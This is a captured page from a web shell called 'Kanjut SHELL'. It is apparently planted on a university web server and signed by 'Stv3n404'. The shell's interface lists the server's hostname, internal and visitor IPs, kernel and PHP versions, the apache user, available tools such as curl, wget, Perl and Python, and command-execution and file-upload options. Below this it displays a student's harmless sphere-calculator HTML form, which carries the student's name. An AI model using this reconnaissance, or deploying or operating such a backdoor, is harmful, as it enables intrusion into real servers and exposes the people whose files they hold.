Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.147.48.105
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/inieves/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/inieves/www/sphereForm.html
<!--
	File: sphereForm.html
	Assignment: 3A
	Due: Feb. 15, 2018
	Author: Ismael Nieves
	Goal: Create a form that accepts the radius of a sphere
	      and a PHP page that displays the volume (1 decimal place)

-->

<HTML>
<BODY BACKGROUND = "https://f.fwallpapers.com/images/3d-sphere_2.jpg">
<BODY STYLE= "color:gold; font-family:algerian;">
<CENTER>
<H2 style="color:gold; font-size:250%; border:2px; border-style:solid; border-color:gold;">
	Sphere Calculator
</H2>

<FORM action = sphereCalculator.php method = post>
Enter the radius of the sphere: <INPUT type=text name=radius>
<P>
<INPUT type=submit value="Submit Form">
<INPUT type=reset value="Reset Form">
</FORM>
</CENTER>
</BODY>
</HTML>

Stv3n404 - 2023